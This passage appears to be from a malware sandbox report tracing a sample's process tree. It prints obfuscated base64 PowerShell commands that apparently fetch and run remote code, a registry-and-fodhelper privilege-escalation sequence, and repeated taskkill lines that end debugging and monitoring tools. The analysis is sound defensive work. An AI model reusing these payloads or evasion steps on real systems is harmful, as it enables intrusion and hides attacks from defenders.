G0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=" /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:2560
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .alecar /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:4444
- - C:\Windows\system32\fodhelper.exe
    "C:\Windows\system32\fodhelper.exe"
    3⤵
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Users\Public\Music\SystemProcessHost.SystemProcesses
      "C:\Users\Public\Music\SystemProcessHost.SystemProcesses" powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=
        5⤵
        Blocklisted process makes network request
        
        PID:4684
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1552
      - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" import C:\ProgramData\SysWebConfig\ass
        6⤵
        
        PID:1416
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3120
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4420
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4428
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3356
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3892
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5080
      - C:\Windows\system32\taskkill.exe
        
